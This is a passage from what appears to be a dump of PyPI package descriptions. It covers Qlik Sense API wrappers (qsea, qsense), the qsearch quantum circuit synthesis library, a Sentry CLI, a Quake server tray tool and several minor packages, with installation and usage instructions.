Sense.app=qsea.App(conn,'MyAppName')By default the App class object is almost empty. Use theload()function to make use of it:app.load()Now all variables, master measures, and dimensions are uploaded to our App object. We can access them by their name:var=app.variables['MyVar']var.definitionms=app.measures['MyMeasure']ms.label_expressionOr, we can overview their properties via a pandas DataFrame.app.dimensions.dfLet's create a new measure:app.measures.add(name='MyMeasure',definition='sum(Sales)')or update a variable:var.update(definition='sum(Sales)')Save the app to ensure that the changes are reflected in the real Qlik Sense application.app.save()Let's copy the set of master dimensions into a new app:source_app=qsea.App(conn,'Source AppName')target_app=qsea.App(conn,'Target AppName')source_app.load()target_app.load()fordiminsource_app.dimensions:ifdim.namenotin[target_dim.namefortarget_dimintarget_app.dimensions]:target_app.dimensions.add(name=dim.name,definition=dim.definition)target_app.save()For unknown reasons, on certain instances of Qlik Sense, changes in the App may not be visible in the Qlik Sense interface. The usual workaround is to make a new copy of the Application (via QMC or Hub). Usually, all changes can be seen in the copy.Note that as it stands, only basic properties, such as names, definitions, and a couple of others, can be accessed via the qsea module.Most read-only operations (such as loading apps) can be performed on published apps. However, it is recommended to modify objects only in unpublished apps.Besides master measures, master dimensions, and variables, tables and charts in the App can also be uploaded.It's highly recommended to make a backup copy of your application.app.load()sh=app.sheets['MySheet']sh.load()forobjinsh.objects:formsonobj.measures:print(ms.definition)Good luck!Full GuideConnection classThe class that represents a dictionary of websocket connections to Qlik Sense Engine API\nSince one websocket connection can be used only for one app, this class is used to handle all websocket connections\nNew websocket connections are created automatically when a new app object is createdNote that the Qlik Sense Engine API has a limit of active parallel connections. Since there is no way to terminate the existing connection (except restarting the proxy server that is generally unacceptable), one have to wait for the Qlik Sense Engine to terminate some of the old sessions.\nThere is no way to reconnect to an existing connection if the Connection class object is recreated. Thus, it is highly recommended to avoid recreating the Connection class object in order to avoid reaching the limit of active connections.App classThe class, representing the Qlik Sense application. This is the main object to work with. The class is empty when created; run theload()function to make use of it.App.load()Loads data from the Qlik Sense application into an App object.Args:depth (int): depth of loading1 - app + variables, measures, sheets, fields, dimensions (default value)2 - everything from 1 + sheet objects (tables, sharts etc.)3 - everything from 2 + object dimensions and measuresDifferent levels can be useful when working with large apps, as a full load can be time-consuming. Only dimensions and measures from standard Qlik Sense charts are uploaded. Uploading dimensions from filter panes is currently not supported.App.load(level=3)App.save()You have to save the App object for the changes to be reflected in the Qlik Sense Application. Note that it is recommended to modify objects only in unpublished apps.App.save()App.reload_data()Starts the script of reloading data into the Qlik Sense Application.App.reload_data()App.childrenapp.load(level = 1) creates several objects of AppChildren classAppChildren classThe class contains collections of master objects in the Qlik Sense Application:app.variables: a collection of Variable class objects, representing the variables of the Qlik Sense applicationapp.measures: a collection of Measure class objects, representing the master measures of the Qlik Sense applicationapp.dimensions: a collection of Dimension class objects, representing the master dimensions of the Qlik Sense applicationapp.sheets: a collection of Sheet class objects, representing the sheets of the Qlik Sense applicationapp.fields: a collection of Field class objects, representing the fields of the Qlik Sense applicationYou can access the main information about each group of objects in a pandas DataFrame via the.dfattribute:app.variables.dfAppChildren.add()Use theadd()function to add new variables, master measures or master dimensions to the app.Args:name (str): Name of the object to be created.definition (str): Definition of the object to be created.description (str, optional): Description of the object to be created. Defaults to ''.label (str, optional): Label of the object to be created. Defaults to ''.label_expression (str, optional): Label expression of the object to be created. Defaults to ''.format_type (str, optional): Format type of the object to be created. Defaults to 'U'.'U' for auto'F' for number'M' for money'D' for date'IV' for duration'R' for otherformat_ndec (int, optional): Number of decimals of the object to be created. Defaults to 10.format_use_thou (int, optional): Use thousands separator for the object to be created. Defaults to 0.format_dec (str, optional): Decimal separator for the object to be created. Defaults to ','.format_thou (str, optional): Thousands separator for the object to be created. Defaults to ''.Returns: True if the object was created successfully, False otherwise.\nOnly parameters applicable to the specific class will be usedApp.variables.add(name='MyVar',definition='sum(Sales)')App.measures.add(name='MyFunc',definition='sum(Sales)',format_type='F')App.dimensions.add(name='MyDim',definition='Customer')Variable classThe class represents variables of the application and is a member of the App.variables collection. You can access a specific variable by its name or iterate through them:var=app.variables['MyVar']print(var.definition)forvarinapp.variables:ifvar.definition=='sum(Sales)':var.update(name='varSales')Variable propertiesname: this is the name of the variable you generally use in the Qlik Sense interfacedefinition: the formula behind the variabledescription: the description of the variableauxiliaryhandle: the internal handle of the object in the Qlik Sense Engine API; can be used to access the variable via thequery()functionapp_handle: the handle of the parent App objectid: Qlik Sense internal id of the variableparent: App-children object; you can access the App class object like thisvar.parent.parentcreated_date: creation date of the variable, as stored in Qlik Sensemodified_date: date of the last modification of the variable, as stored in Qlik Sensescript_created: True if the variable is created via the application load script, False if not.Variable.update()Updates the variable on the Qlik Sense ServerArgs:definition (str, optional): new definition of the variable (leaveNoneto keep the old value)description (str, optional): new description of the variable (leaveNoneto keep the old value)Returns:\nTrue if the variable was updated successfully, False otherwisevar=app.variables['MyVar']var.update(definition='sum(Sales)')app.save()Variable.delete()Deletes the variable from the Qlik Sense ServerReturns:\nTrue if the variable was deleted successfully, False otherwisevar=app.variables['MyVar']var.delete()app.save()Variable.rename()Renames the variable on the Qlik Sense Server. Since there is no direct method to rename the variable, it essentially deletes the variable with the old name, and creates a new one, with the new name.Returns:\nTrue if the variable is renamed successfully, False otherwisevar=app.variables['MyVar']var.rename('MyVarNewName')app.save()Variable.get_layout()Returns the json layout of the variable; a shortcut to the GetLayout method of the Engine APIvar.get_layout()Measure classThe class represents master measures of the application and is a member of the App.measures collection. You can access a specific measure by its name or iterate through them.ms=app.measures['MyMeasure']print(ms.definition)formsinapp.measures:ifms.definition=='sum(Sales)':ms.update(name='Sales')Measure propertiesname: the name of the measure you generally use in the Qlik Sense interfacedefinition: the formula behind the measuredescription: the description of the measurelabel: the label of the measure, as it appears in chartslabel_expression: the label expression of the measureformat_type: Format type of the object'U' for auto'F' for number'M' for money'D' for date'IV' for duration'R' for otherformat_ndec: Number of decimals for the objectformat_use_thou: Use thousands separator for the objectformat_dec: Decimal separator for the objectformat_thou: Thousands separator for the objectauxiliaryhandle: the internal handle of the object in the Qlik Sense Engine API; can be used to access the measure via thequery()functionapp_handle: the handle of the parent App objectid: Qlik Sense internal id of the measureparent: AppChildren object; you can access the App class object like thisms.parent.parentcreated_date: creation date of the measure, as stored in Qlik Sensemodified_date: date of the last modification of the measure, as stored in Qlik SenseMeasure.update()Updates the measure on the Qlik Sense ServerArgs:definition (str, optional): The definition of the measuredescription (str, optional): the description of the measurelabel (str, optional): the label of the measure, as it appears in chartslabel_expression (str, optional): the label expression of the measureformat_type (str, optional): Format type of the object to be created. Defaults to 'U'.'U' for auto'F' for number'M' for money'D' for date'IV' for duration'R' for otherformat_ndec (int, optional): Number of decimals for the object to be created. Defaults to 10.format_use_thou (int, optional): Use thousands separator for the object to be created. Defaults to 0.format_dec (str, optional): Decimal separator for the object to be created. Defaults to ','.format_thou (str, optional): Thousands separator for the object to be created. Defaults to ''.Returns:\nTrue if the measure was updated successfully, False otherwisems=app.measures['MyMeasure']ms.update(definition='sum(Sales)',label='Total Sales',format_type='F')app.save()Measure.delete()Deletes the measure from the Qlik Sense ServerReturns:\nTrue if the measure was deleted successfully, False otherwisems=app.measures['MyMeasure']ms.delete()app.save()Measure.rename()Renames the measure on the Qlik Sense Server.Returns:\nTrue if the measure was renamed successfully, False otherwisems=app.measures['MyMeasure']ms.rename('MyMeasureNewName')app.save()Measure.get_layout()Returns the json layout of the measure; a shortcut to the GetLayout method of the Engine APIms.get_layout()Dimension classThe class represents master dimensions of the application and is a member of the App.dimensions collection. You can access a specific dimension by its name or iterate through them. Note that hierarchical dimensions are not yet supported.\"dim=app.dimensions['MyDimension']print(dim.definition)fordiminapp.dimensions:ifdim.definition=='[Customer]':dim.update(name='Customer_dimension')Dimension propertiesname: the name of the dimension you generally use in the Qlik Sense interfacedefinition: the formula behind the dimensionlabel: the label of the dimension, as it appears in chartsauxiliaryhandle: the internal handle of the object in the Qlik Sense Engine API; can be used to access the dimension via thequery()functionapp_handle: the handle of the parent App objectid: Qlik Sense internal id of the dimensionparent: AppChildren object; you can access the App class object like thisdim.parent.parentcreated_date: creation date of the dimension, as stored in Qlik Sensemodified_date: date of the last modification of the dimension, as stored in Qlik SenseDimension.update()Updates the dimension on the Qlik Sense ServerArgs:definition (str, optional): The definition of the dimensionlabel (str, optional): the label of the dimension, as it appears in chartsReturns:\nTrue if the dimension was updated successfully, False otherwisedim=app.dimensions['MyDimension']dim.update(definition='Customer',label='Customer_dimension')app.save()Dimension.delete()Deletes the dimension from the Qlik Sense ServerReturns:\nTrue if the dimension was deleted successfully, False otherwisedim=app.dimensions['MyDimension']dim.delete()app.save()Dimension.rename()Renames the dimension on the Qlik Sense Server.Returns:\nTrue if the dimension was renamed succesfully, False otherwisedim=app.dimensions['MyDimension']dim.rename('MyDimensionNewName')app.save()Dimension.get_layout()Returns the json layout of the dimension; a shortcut to the GetLayout method of the Engine APIdim.get_layout()Sheet classThe class represents the sheets of the application and is a member of the App.sheets collection. You can access objects on the sheets, such as charts and tables, via the Sheet class object.forshinapp.sheets:print(sh.name)Sheet propertiesname: that's the name of the sheetdescription: the description of the sheetauxiliaryhandle: the internal handle of the object in Qlik Sense Engine API; can be used to access the sheet via thequery()functionapp_handle: the handle of the parent App objectid: Qlik Sense internal id of the sheetparent: AppChildren object; you can access the App class object like thisms.parent.parentcreated_date: creation date of the sheet, as stored in Qlik Sensemodified_date: date of the last modification of the sheet, as stored in Qlik Sensepublished: True if the sheet is published, False if notapproved: True if the sheet is approved, False if notowner_id: GUID of the owner of the sheetowner_name: name of the owner of the sheetSheet.load()Loads objects from the sheet in a Qlik Sense application into a Sheet class objectsh=App.sheets['MySheet']sh.load()forobjinsh.objects:print(obj.type)Sheet.get_layout()Returns the json layout of the sheet; a shortcut to the GetLayout method of the Engine APIsh.get_layout()Field classThe class represents the fields of the application and is a member of the App.fields collection. You can only use the class for information purposes; no changes can be made with fields via QSEA.\"forfldinapp.fields:print(field.table_name,field.name)Field propertiesname: name of the field, as it appears in the modeltable_name: name of the table, containing the fieldinformation_density, non_nulls, rows_count, subset_ratio, distinct_values_count, present_distinct_values, key_type, tags: properties of the fields as they can be found in the data modelauxiliaryhandle: internal handle of the field objectapp_handle: handle of the parent App objectObject classThe class represents the objects on the sheet, such as charts and tables, and is a member of the SheetChildren collection.Object propertiestype: type of the object, such as 'piechart' or 'pivot-table'col, row, colspan, rowspan, bounds_y, bounds_x, bounds_width, bounds_height: parameters referring to the location of an object on the sheetauxiliaryhandle: the internal handle of the object in the Qlik Sense Engine API; can be used to access the object via thequery()functionsheet_handle: handle of the parent sheetsheet: the Sheet object, on which the object itself is locatedid: Qlik Sense internal id of the objectparent: SheetChildren objectObject.export_data()Performs data export of an object (such as a table or chart) to an xslx or csv file.Args:file_type (str, optional): 'xlsx' or 'csv', 'xlsx' by defaultReturns: the path to the downloaded file in case of success, None if failedObject.load()Loads measures and dimensions of the object in a Qlik Sense application into an Object class instance.sh=App.sheets['MySheet']sh.load()forobjinsh.objects:ifobj.type=='piechart':obj.load()print(obj.dimensions.count)Object.get_layout()Returns the json layout of the object; a shortcut to the GetLayout method of the Engine APIobj.get_layout()ObjectChildren classThe class contains collections of measures and dimensions in the object on the sheet:object.measures: a collection of ObjectMeasure class objects, representing the measures in the object on the sheetobject.dimensions: a collection of ObjectDimension class objects, representing the dimensions in the object on the sheetYou can access the main information in pandas DataFrame via.df:App.sheets['MySheet'].objects['object_id'].measures.dfAdding measures and dimensions to app objects is not supported yet.ObjectMeasure classThis class represents measures of the object on the sheet and is a member of the object.measures collection. Since there may be no specific name for the measure in the object, the internal Qlik ID is used instead of the name. Thus, you can either iterate through measures or call them by the internal Qlik ID:ms=obj.measures['measure_id']print(ms.definition)formsinobj.measures:ifms.definition=='sum(Sales)':ms.update(definition='sum(Incomes)')ObjectMeasure propertiesname: internal Qlik id of the measuredefinition: the formula behind the measurelabel: the label of the measure, as it appears in the chartslabel_expression: the label expression of the measurecalc_condition: calculation condition for the measurelibrary_id: if a master measure is used, this refers to its IDformat_type: Format type of the object'U' for auto'F' for number'M' for money'D' for date'IV' for duration'R' for otherformat_ndec: Number of decimals of the objectformat_use_thou: Use thousands separator for the objectformat_dec: Decimal separator for the objectformat_thou: Thousands separator for the objectauxiliaryapp_handle: the handle of the parent App objectparent: ObjectChildren objectobject: you can access the Object class object like thisms.objectObjectMeasure.update()Updates the measure in the object on the sheet.Args:definition (str, optional): The definition of the measurelabel (str, optional): the new label of the measure, as it appears in chartslabel_expression (str, optional): the label expression of the measurecalc_condition (str, optional): calculation condition for the measurelibrary_id (str, optional): id of the master measureformat_type (str, optional): Format type of the object. Defaults to 'U'.'U' for auto'F' for number'M' for money'D' for date'IV' for duration'R' for otherformat_use_thou (int, optional): Use thousands separator for the object. Defaults to 0.format_dec (str, optional): Decimal separator for the object. Defaults to ','.format_thou (str, optional): Thousands separator for the object. Defaults to ''.Returns:\nTrue if the measure was updated successfully, False otherwisems=obj.measures['measure_id']ms.update(definition='sum(Sales)',label='Total Sales',format_type='F')app.save()ObjectMeasure.delete()Deletes the measure from the object on the sheetReturns:\nTrue if the measure was deleted successfully, False otherwisems=obj.measures['measure_id']ms.delete()app.save()ObjectDimension classThis class represents dimensions of the object on the sheet and is a member of the object.dimensions collection. Since there may be no specific name for the dimension in the object, the internal Qlik ID is used instead of the name. Thus, you can either iterate through dimensions or call them by the internal Qlik ID:dim=obj.measures['dimension_id']print(dim.definition)fordiminobj.dimensions:ifdim.definition=='[Customer]':dim.update(definition='[Supplier]')Note that hierarchical dimensions are not supported yet.ObjectDimension propertiesname: internal Qlik id of the dimensiondefinition: the formula behind the dimensionlabel: the label of the dimension, as it appears in the chartsauxiliaryapp_handle: the handle of the parent App objectparent: ObjectChildren objectobject: you can access the Object class object like thisdim.objectObjectDimension.update()Updates the dimension in the object on the sheetArgs:definition (str, optional): the definition of the dimensionlabel (str, optional): the label of the dimension, as it appears in chartscalc_condition (str, optional): calculation condition for the dimensionReturns:\nTrue if the dimension was updated successfully, False otherwisedim=obj.dimensions['dimension_id']dim.update(definition='Customer',label='Customer_dimension')app.save()ObjectDimension.delete()Deletes the dimension from the Qlik Sense ServerReturns:\nTrue if the dimension was deleted successfully, False otherwisedim=app.dimensions['dimension_id']dim.delete()app.save()LicenseThis project is licensed under the MIT License - see theLICENSEfile for details.History[0.0.17] - 2024-01-31Fixed some problems that occured if the connection class object was recreated before terminating the connection to Qlik Sense Engine API[0.0.16] - 2023-10-03Minor changes[0.0.15] - 2023-10-03Minor changes[0.0.14] - 2023-10-01Addedobject.export_data() function which performs data export of an object (such as a table or chart) to an xslx or csv fileget_layout() function for measures, dimensions, variables, sheets and objects; the functions return the json layout"} +{"package": "qsearch", "pacakge-description": "qsearchAn implementation of a quantum gate synthesis algorithm based on A* and numerical optimization. It relies onNumPyandSciPy. It can export code forQiskitandOpenQASM.This is an implementation of the algorithm described in the paperTowards Optimal Topology Aware Quantum Circuit Synthesis.These are some results showing how qsearch can provide optimal or near optimal results. We compare results to theUniversalQ Compiler.Circuit# of QubitsRef #CNOT LinearCNOT RingUQ (CNOT Ring)CNOT Linear Unitary DistanceCNOT Ring Unitary DistanceQFT367*6*151.33 * 10-142.22 * 10-16Fredkin388791.76 * 10-140.0Toffoli368691.14 * 10-140.0Peres3576191.13 * 10-140.0HHL3N/A3*3*161.25 * 10-140.0Or3686101.72 * 10-140.0EntangledX342,3,42,3,491.26 * 10-140.0TFIM_3_33444170.00.0TFIM_6_33866174.44 * 10-160.0TFIM_42_335666178.88 * 10-160.0TFIM_60_338066176.66 * 10-160.0QFT4N/A13*896.66 * 10-16TFIM_30_446011879.08 * 10-11IBM Challenge4N/A4DNR0.0* Some gates occasionally resulted in circuits with different CNOT counts due to the optimizers getting stuck in local minima. The best run out of 10 is listed in these cases. The CNOT count for these circuits was occasionally 1 more than listed. The gate \"EntangledX\" is a parameterized gate, and for certain combinations of parameters we were able to produce solutions with fewer CNOTs than the hand-optimized general solution.InstallationThis is a python package which can be installed using pip. You will need a Python version of at least 3.6. The qsearch compiler currently runs on macOS, Linux (includingthe Windows Subsystem for Linux) and Windows (performance is much worse on Windows). You can install it fromPyPiusing:pip3 install qsearchYou can also install from the git repository:pip3 install https://github.com/BQSKit/qsearch/archive/dev.zipor download and install it:git clone https://github.com/BQSKit/qsearch\npip3 install --upgrade ./qsearchIf you make changes to your local copy, you can reinstall the package:pip3 install --upgrade ./qsearchOnce installed, you can import the library like any other python package:import qsearchGetting Started: qsearch ProjectsThe simplest way to use the qsearch library is by using a project. When you create a project, you provide a path where a directory will be created to contain the project's files.import qsearch\nmyproject = qsearch.Project(\"desired/path/to/project/directory\")You can then add unitaries to compile, and set compiler properties. Unitary matrices should be provided asnumpyndarrays usingdtype=\"complex128\".myproject.add_compilation(\"gate_name\", gate_unitary)\nmyproject[\"compiler_option\"] = valueOnce your project is configured, you can start your project by callingrun(). The compiler uses an automatic checkpointing system, so if it is killed while in-progress, it can be resumed by callingrun()again.myproject.run()Once your project is finished, you can get OpenQASM output:myproject.assemble(\"gate_name\") # This will return a string of OpenQASM\nmyproject.assemble(\"gate_name\", write_location=\"path/to/output/file\") # This will write the qasm to the specified path.Compiling Without ProjectsIf you would like to avoid working with Projects, you can use theSearchCompilerclass directly.import qsearch\ncompiler = qsearch.SearchCompiler()\nresult = compiler.compile(target=target_unitary)TheSearchCompilerclass and thecompilefunction can take extra arguments to further configure the compiler. The returned value is a dictionary that contains the unitary that represents the implemented circuit, theqsearch.gates.Gaterepresentation of the circuit structure, and the vector of parameters for the circuit structure.A Note On EndiannessWe use the physics convention of using big endian when naming our qubits. Some quantum programs, including IBM's Qiskit, use little endian. This means you will need to reverse the endianness of a unitary designed for Qiskit in order to work with our code, or visa versa. We provide a function that performs endian reversal on numpy matrices:little_endian = qsearch.utils.endian_reverse(big_endian) # you can use the same function to convert in the other direction as wellDocumentation and ExamplesThe documentation and API reference can be foundon readthedocs.Also check out theexamples!Legal/Copyright informationPlease read ourLICENSE"} +{"package": "q_searcher", "pacakge-description": "\u91cf\u5316\u7684\u65f6\u5e8f\u51fd\u6570\u5305\u6295\u7814\u56e2\u961f\u81ea\u7528\u5305\uff0c\u51fa\u95ee\u9898\u4e86\u8bf7\u63d0 Issue\u3001\u4fee\u590d\u540e\u8bf7\u5173\u95ed Issue\u3002\u529f\u80fd\u5217\u8868\u521d\u59cb\u5316td_init_run(configs=None)\uff1a\u521d\u59cb\u5316\u5305td_db_connect()\uff1a\u83b7\u53d6\u4e00\u4e2a\u6570\u636e\u5e93\u8fde\u63a5A \u80a1\u83b7\u53d6\u4fe1\u606f\u83b7\u53d6\u6240\u6709\u6307\u6570\uff08\u80a1\u7968\u5e02\u573a\u3001\u5f53\u524d\u6709\u6548\u7684\uff09: get_all_index\u83b7\u53d6\u6240\u6709\u80a1\u7968\uff08\u80a1\u7968\u5e02\u573a\u3001\u5f53\u524d\u6709\u6548\u7684\uff09: get_all_security\u83b7\u53d6\u6807\u7684\u7684\u6700\u65b0\u4fe1\u606f\uff08\u80a1\u7968\u5e02\u573a\u3001\u4e0d\u5305\u542b\u672a\u6765\uff09: get_data\u83b7\u53d6\u9f99\u864e\u699c\u80a1\u7968\u5217\u8868: get_dragon_tiger_listCode/Style Linter\u6211\u4eec\u4f7f\u7528Ruff\u4f5c\u4e3a\u4ee3\u7801\u68c0\u67e5\u5668\uff0c\u8bf7\u5728\u63d0\u4ea4\u524d\u4f7f\u7528\u4ee5\u4e0b\u547d\u4ee4\uff0c\u786e\u4fdd PR \u7684\u987a\u5229\u8fdb\u884c\uff1aruff check .ruff format .\u6253\u5305\u66f4\u65b0pyproject.toml\u6587\u4ef6\u6267\u884c./build.sh\u8f93\u5165 API token\u65e7\u7684\u6253\u5305\u65b9\u5f0f\uff1a\u66f4\u65b0pyproject.toml\u6587\u4ef6\u6267\u884cpython -m build\u6267\u884cpython -m twine upload dist/*\u5bf9\u8f93\u5165\u6846\uff0c\u8f93\u5165\u8d26\u53f7:__token__\u5e76\u56de\u8f66\u6700\u540e\u8f93\u5165 API token \u5373\u53ef\u6d4b\u8bd5\u9700\u8981\u8fd0\u884c\u81ea\u52a8\u5316\u6d4b\u8bd5\uff1fpoetry run pytest\u5982\u679c\u4f60\u5e0c\u671b\u4f7f\u7528 Poetry \u63d0\u4f9b\u7684\u865a\u62df\u673a\u5236\uff0c\u4e5f\u9700\u8981\u672c\u5730\u63d0\u793a\u3002\u8bd5\u8bd5\u8fd9\u4e2a\uff1a\u6267\u884cpython -m build\u672c\u5730\u5b89\u88c5\u5305pip install dist [package-...-any.whl]"} +{"package": "qsee", "pacakge-description": "### qsee: A quantum object search engineContributors: Vu Tuan Hai, Nguyen Tan Viet, Le Bin HoDescription: Quantum programming is being used to address multiple problems in quantum technology fields, from quantum machine learning, quantum computing to quantum physics. Recent advances revolve around the use of quantum programming and quantum compiling, which promises to revolutionize program computation and boost quantum state preparation and tomography\u2019s problem-solving capabilities. However, using quantum computing technologies requires high-level coding skills, which is not trivial for physics scientists. For such a reason, we propose qsee, a Python library that allows researchers and practitioners to configure and experiment with quantum compilation pipelines, within save and load results features for science reports. We showcase the architecture and main features of qsee, other than discussing its envisioned impact on research and practice.How to use:Additional information:Code of conducting:License: MIT LICENSE"} +{"package": "qseispy", "pacakge-description": "QseisPyA python version of Qseis for calculating 1D synthetic seismograms.WARNING: QseisPy is still very new and under development.poetry config [pypi-token]\n\npoetry build -f wheel\n\npoetry publish"} +{"package": "qself", "pacakge-description": "qselfThis file will become your README and also the index of your\ndocumentation.InstallpipinstallqselfHow to useimportosfromqself.ouraimportOuraAPIClientclient=OuraAPIClient(os.environ[\"OURA_PERSONAL_ACCESS_TOKEN\"])Note that this assumes that theOURA_PERSONAL_ACCESS_TOKENenvironment\nvariable contains a personal access token which you can createhere."} +{"package": "qsemailer", "pacakge-description": "No description available on PyPI."} +{"package": "qsense", "pacakge-description": "qSenseqsenseis a python library and command line tool for QLIK QlikSense. It contains some useful functions for administrators/developers of QLiksenseIt is built on top of the python librariesqsAPIandpyqlikengineInstallationpip install qsenseUsageexport LOGLEVEL=DEBUGNAMEqsense-qsenseisapythonlibraryandcommandlinetoolforQliksenseadministrators\n\nSYNOPSISqsenseCOMMAND\n\nDESCRIPTIONqsenseisapythonlibraryandcommandlinetoolforQliksenseadministrators\n\nCOMMANDSCOMMANDisoneofthefollowing:add_entityaddanewentity(user,stream,dataconnection,...)deallocate_analyzer_licenses_for_professionalsDeallocateanalyzerlicensefomuserswithaprofessionallicensedeallocate_unused_analyzer_licensesDeallocateanalyzerlicensenotusedforNdaysdelete_removed_exernally_usersDeleteusersthatwereremovedexternally(fromactivedirectory?)delete_user_sessiondeleteusersessionentityGetaspecificentitybyIDorentitylistorcountexport_appsExport(publishedorpassinganyotherfilter)applicationstoqvdfilesgetgenericgethttpfromQlik(servicecanbeqrsorqps)get_app_connectionsExtracttheconnectionsfromanappget_app_dataconnectionsExtractthedataconnectionsfoundintheappscriptget_app_scriptExtracttheETLscriptfromanapphealthcheckGetaspecificentitybyIDorentitylistorcountold_appsFindoldappsusing'modified_date'and'last_reload_time'filters:thenyoucanexportthemordeleteornotifyviaemailtheownersopen_docLoadanappinmemory,usefulforpreloadinganapp/cachawarmerpostNOTTESTED:genericposthttptoQlik(servicecanbeqrsorqps)update_custom_property_with_users_listupdatethevaluesofacustompropertywiththelistofallqliksenseusersupdate_entityupdateanentity(user,stream,dataconnection,...)user_sessionsusersessionsusersGetuserswithgroupsusers_with_unpublished_appsFinduserswithtoomanyunpublishedappsLook at the source file qsense/command_line.py for detailsExamplesChanging all data connections after a file server migrationJSONFILE=ds-shares.json\nrm$JSONFILEqsensegetqlikserver.redaelli.orgclient.pem/qrs/dataconnection/full--pFilter\"connectionstring sw '\\\\\\\\\\\\\\amzn'\"|jq'.'>$JSONFILEsed-e's/amznfsx94rgsb1e/amznfsxe9chyjel/g'${JSONFILE}>new-${JSONFILE}qsenseupdate_entityqlikserver.redaelli.orgclient.pemdataconnectionnew-${JSONFILE}Exporting and/or deleting old applicationsNot published and not updated/reloaded in the last 120 daysqsenseold_appsqlikserver.redaelli.orgclient.pem/qrs/dataconnection/full--target_path/tmp--modified_days=120--last_reload_days=120--export--deletePublished in some specific streams and not updated/reloaded in the last 120 daysqsenseold_appsqlikserver.redaelli.orgclient.pem/qrs/dataconnection/full--target_path/tmp--modified_days=120--last_reload_days=120--published--pFilter\"(stream.name eq '000' or stream.name eq 'AAA' or stream.name eq 'BBB' or stream.name eq 'CCC')\"--export--deleteRemoving analyzer licenses for professional usersqsensedeallocate_analyzer_licenses_for_professionalsqlikserver.redaelli.orgclient.pem--nodryrunTop users with unpublished appsqsenseusers_with_unpublished_appsqlikserver.redaelli.orgclient.pem--threshold30"} +{"package": "qsentry", "pacakge-description": "QsentryQsentry is a command line wrapper for Sentry's API.Some Command ExamplesTop level commands$ qsentry --help\nUsage: qsentry [OPTIONS] COMMAND [ARGS]...\n\nOptions:\n --help Show this message and exit.\n\nCommands:\n get Display resources such as members, teams, organizations and etc.\n update Update a resource such as a client keyGet command$ qsentry members --help\nUsage: qsentry get [OPTIONS] COMMAND [ARGS]...\n\n Display resources such as members, teams, organizations and etc.\n\nOptions:\n --help Show this message and exit.\n\nCommands:\n client-keys Get all client keys of the given project.\n members Get the members\n projects Get the projects\n teams Get the teams\n users Get all users of the given organization."} +{"package": "qserious", "pacakge-description": "UNKNOWN"} +{"package": "qserve", "pacakge-description": "No description available on PyPI."} +{"package": "qserver", "pacakge-description": "QServerThis is only a dummy package to prevent malicious packages with similar names. Current version of server is not open-source"} +{"package": "q-server", "pacakge-description": "Q-ServerThis is only a dummy package to prevent malicious packages with similar names. Current version of server is not open-source."} +{"package": "qserverinfo", "pacakge-description": "QServerInfoShows info about quake servers in the trayHow to install (linux only)pipinstallqserverinfoUsageqserverinfo[IP]:[PORT]Additional arguments:-n NAME, --name NAME server name, it will be shown in GUI\n-it ICON_TITLE, --icon-title ICON_TITLE\n text on top of icon\n-rd REQUEST_DELAY, --request-delay REQUEST_DELAY\n how often server will be requested; in seconds, minimum 30, default 60\n-fb, --filter-bots remove bots from players count if possible\n-e EXECUTABLE, --executable EXECUTABLE\n path to game executable which will start after \"Join\" button click with parameter \"+connect
\"\n-m, --show-mapname display mapname in the window if possibleSupported gamesPossibly all games that supported byhttps://github.com/cetteup/pyq3serverlistWhat I tested and its working:XonoticOpenArenaWarsowDoombringerNot working:QuakeWorldAlienArena"} +{"package": "qservice", "pacakge-description": "No description available on PyPI."} +{"package": "qservices-library", "pacakge-description": "No description available on PyPI."} +{"package": "qset-python-client", "pacakge-description": "No description available on PyPI."} +{"package": "qset-tslib", "pacakge-description": "No description available on PyPI."} +{"package": "qs-files", "pacakge-description": "qs-filesqs-files- \u044d\u0442\u043e Python \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430, \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u043d\u0430\u044f \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u0430\u043c\u0438 \u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f\u043c\u0438 \u0432 \u0444\u043e\u0440\u043c\u0430\u0442\u0435 .qs. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044d\u0442\u043e\u0439 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u043b\u0435\u0433\u043a\u043e \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c, \u0438\u0437\u043c\u0435\u043d\u044f\u0442\u044c \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0432 \u0432\u0430\u0448\u0438\u0445 Python \u043f\u0440\u043e\u0435\u043a\u0442\u0430\u0445.\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430\u0412\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e pip:pipinstallqs-files\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435qs-files\u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0443\u0434\u043e\u0431\u043d\u044b\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 .qs \u0444\u0430\u0439\u043b\u0430\u043c\u0438. \u041e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442:\u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0438 \u043f\u0430\u0440\u0441\u0438\u043d\u0433 .qs \u0444\u0430\u0439\u043b\u043e\u0432.\u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435, \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0439.\u041f\u043e\u0438\u0441\u043a .qs 